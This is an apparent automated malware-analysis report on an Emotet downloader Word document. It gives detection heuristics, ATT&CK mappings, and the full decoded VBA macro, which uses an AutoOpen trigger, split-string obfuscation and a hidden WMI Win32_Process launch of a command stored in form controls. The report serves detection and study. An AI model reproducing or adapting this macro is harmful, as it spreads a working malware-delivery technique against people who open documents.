MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample contains an AutoOpen VBA macro that uses obfuscated string concatenation to call GetObject with 'winmgmts:win32_process'. This indicates an attempt to launch a new process, likely to download and execute a secondary payload. ClamAV detection confirms this is a known Emotet downloader variant.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6978977-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6978977-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2816 bytes |
SHA-256: 30650081fac574207949b4b62ba861dd0854d83063269e787397dbdfcfd1c95b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UBQaH9"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Tz701JJA, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "zaWwOBaH, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "ctrHjBh, 2, 2, MSForms, ComboBox"
Sub _
autoopen()
Debug.Print (405) + (752)
Debug.Print kTDVkj8A + (694)
Debug.Print (jmmjvWME) + (827)
Debug.Print (482) + GGQdisFs
dtaAzQ
Debug.Print (62) + (382)
Debug.Print YojjUD2 + (176)
Debug.Print (covtZAz) + (64)
Debug.Print (830) + jW3RFG
End Sub
Attribute VB_Name = "Fl1DrNmA"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a0Viqr4"
Attribute VB_Name = "GbUc5VnO"
Attribute VB_Name = "A1zt1N4L"
Attribute VB_Name = "fACVQjlD"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iiC9nUad"
Function dtaAzQ()
If 920525 = 920525 Then
Debug.Print (861) + (606)
Debug.Print BU0KjU + (793)
Debug.Print (T_2MPd) + (106)
Debug.Print (792) + IKLiKcJ
Set mR9hD3SQ = GetObject("wi" + "n" + "mg" + "mts:w" + "in32" + "_proc" + "ess" + "sta" + "rtup")
End If
Debug.Print (409) + (453)
Debug.Print ijvVr1V + (524)
Debug.Print (rizk__) + (698)
Debug.Print (241) + B3zwIQEt
rC1YQn = 0
Debug.Print (440) + (397)
Debug.Print rY_TXU + (165)
Debug.Print (GwAdBuwF) + (777)
Debug.Print (275) + iF5CZYb1
With mR9hD3SQ
Debug.Print (151) + (970)
Debug.Print TWcOdIEd + (262)
Debug.Print (VYTJTBpV) + (511)
Debug.Print (454) + dLZXWC75
. _
ShowWindow = rC1YQn + rC1YQn
Debug.Print (709) + (832)
Debug.Print qmN88O + (269)
Debug.Print (bhMArjQ) + (213)
Debug.Print (202) + oNmSmzP
End With
If 920525 = 920525 Then
Debug.Print (202) + (108)
Debug.Print nWNj_i + (621)
Debug.Print (G9JAEuEC) + (426)
Debug.Print (513) + iUln7I
GetObject("wi" + "n" + "mg" + "mts:w" + "in32" + "_proc" + "ess") _
.Create# UBQaH9.zaWwOBaH + UBQaH9.ctrHjBh + UBQaH9.Tz701JJA, f4Sbjw5, mR9hD3SQ, WTu_jX
Debug.Print (624) + (271)
Debug.Print abjo3b + (281)
Debug.Print (QA2Czqz8) + (268)
Debug.Print (57) + ZS_WMIs7
End If
End Function
Attribute VB_Name = "UkKYvQ"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.